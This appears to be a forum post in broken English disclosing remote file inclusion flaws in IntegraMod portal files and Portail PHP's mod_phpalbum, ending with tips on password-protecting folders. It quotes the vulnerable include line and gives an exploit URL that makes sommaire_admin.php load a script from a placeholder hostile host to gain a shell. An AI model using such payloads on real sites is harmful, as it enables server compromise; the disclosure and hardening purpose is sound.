hi guys in 2 week we cane find 4 bugs in integramod portal this bugs whit high risk this form have 5 bug xss and sql injection i can put here until repair but this bug not very importent ! until new bug found this metod name is remot File Inclusion Vulnerabilities whit this bug you can run any php script frome a diferent server such this link
http://www.exmaple.ir/frame.php?body=ht ... 287.txt%3F ( i change domain name but if want i can get a true link!!) see this lins
include_once ($chemin."conf/code.php")
its one line of mod_phpalbum in Portail PHP its have a bug and file inclusion!!! now hacker can access any shell on this server whit this link
http://www.site.com/[path]/mod_phpalbum/sommaire_admin.php?chemin=http://evil_scripts?
in integramod also 4 files have this problem !!
functions_mod_user.php
functions.php
functions_portal.php
i very search and rad line by line on integra files but i can find any dangres bug on this files !!! they have some bug whit low risk but may any hacker can find new bug!!!!!! i dont say integra dont have bug but i try and dont can any dangerus bug!! now if you want dont hack !! whit same method can use cpanel and set permision on your includs folder ! admin folder ! and any folder you think need protect whit password! whit this if your forum have a bug until hacker dont have your password peotect cant do anything!!